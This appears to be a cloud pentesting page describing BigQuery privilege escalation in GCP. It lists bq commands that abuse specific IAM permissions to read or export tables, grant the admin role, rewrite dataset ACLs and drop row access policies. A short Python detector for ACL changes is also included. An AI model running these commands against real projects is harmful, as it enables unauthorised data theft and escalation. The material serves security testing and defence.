GCP - BigQuery Privesc


BigQuery

For more information about BigQuery check:

Read Table

Reading the information stored inside a BigQuery table may expose sensitive information. Accessing that data requires the permissions bigquery.tables.get, bigquery.jobs.create and bigquery.tables.getData:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Export data

This is another way to access the data. Export it to a cloud storage bucket and download the files with the information. This action requires the following permissions: bigquery.tables.export, bigquery.jobs.create and storage.objects.create.

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Insert data

It might be possible to introduce certain trusted data into a BigQuery table in order to abuse a vulnerability somewhere else. This can be done easily with the permissions bigquery.tables.get, bigquery.tables.updateData and bigquery.jobs.create:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

bigquery.datasets.setIamPolicy

An attacker could abuse this permission to give themselves further permissions over a BigQuery dataset:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

This permission alone is enough to update your own access to a BigQuery dataset by modifying the ACLs that define who can access it:

# Download current permissions, requires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>
## Read it with
bq head $PROJECT_ID:<dataset>.<table>
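
For detection, the same bq show --format=prettyjson output can be kept as a baseline and compared against the dataset's current ACL. The following is an added example, not part of the original page: it diffs the access array of two dataset descriptions and flags newly granted entries. The sample ACLs, the e-mail addresses and the HIGH_ROLES / BROAD sets are constructed assumptions.

```python
import json

# Constructed sample: the "access" array as it appears in the output of
# `bq show --format=prettyjson <proj>:<dataset>` (all values are made up).
BASELINE = json.loads("""{"access": [
  {"role": "OWNER",  "userByEmail": "data-admin@example.com"},
  {"role": "READER", "groupByEmail": "analysts@example.com"},
  {"role": "WRITER", "specialGroup": "projectWriters"}
]}""")
CURRENT = json.loads("""{"access": [
  {"role": "OWNER",  "userByEmail": "data-admin@example.com"},
  {"role": "READER", "groupByEmail": "analysts@example.com"},
  {"role": "WRITER", "specialGroup": "projectWriters"},
  {"role": "OWNER",  "userByEmail": "contractor@example.net"},
  {"role": "READER", "groupByEmail": "interns@example.com"},
  {"role": "READER", "specialGroup": "allAuthenticatedUsers"}
]}""")

PRINCIPAL_KEYS = ("userByEmail", "groupByEmail", "domain", "specialGroup", "iamMember")
# Assumption: roles a reviewer treats as high impact when newly granted.
HIGH_ROLES = {"OWNER", "WRITER", "roles/bigquery.dataOwner",
              "roles/bigquery.dataEditor", "roles/bigquery.admin"}
BROAD = {"allAuthenticatedUsers", "allUsers"}

def entries(dataset):
    """Normalise each access entry to a hashable (role, kind, principal) tuple."""
    out = set()
    for e in dataset.get("access", []):
        kind = next((k for k in PRINCIPAL_KEYS if k in e), None)
        if kind is None:  # authorized view/routine/dataset entry: keep it as JSON
            rest = {k: v for k, v in e.items() if k != "role"}
            kind, who = "resource", json.dumps(rest, sort_keys=True)
        else:
            who = e[kind]
        out.add((e.get("role", ""), kind, who))
    return out

def acl_drift(baseline, current):
    """Return (added, removed); each added entry carries a severity tag."""
    old, new = entries(baseline), entries(current)
    added = []
    for role, kind, who in sorted(new - old):
        sev = "high" if role in HIGH_ROLES or who in BROAD else "review"
        added.append({"role": role, "kind": kind, "principal": who, "severity": sev})
    return added, sorted(old - new)

if __name__ == "__main__":
    for a in acl_drift(BASELINE, CURRENT)[0]:
        print(f"[{a['severity']}] +{a['role']} {a['kind']}={a['principal']}")
```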

bigquery.tables.setIamPolicy

An attacker could abuse this permission to give themselves further permissions over a BigQuery table:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

According to the docs, the permissions listed above make it possible to update a row access policy. However, when using the bq CLI you need some more: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # An example filter was used

The filter ID is easy to find in the output of the row access policy enumeration. Example:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09

If you have bigquery.rowAccessPolicies.delete instead of bigquery.rowAccessPolicies.update you can also just delete the policy:

# Remove one
bq query --nouse_legacy_sql 'DROP ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy you need to use this)
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'

Another potential option to bypass row access policies would be to simply change the value of the restricted data. If you can only see rows where term is Cfba, modify all the records of the table to have term = "Cfba". However, BigQuery prevents this.
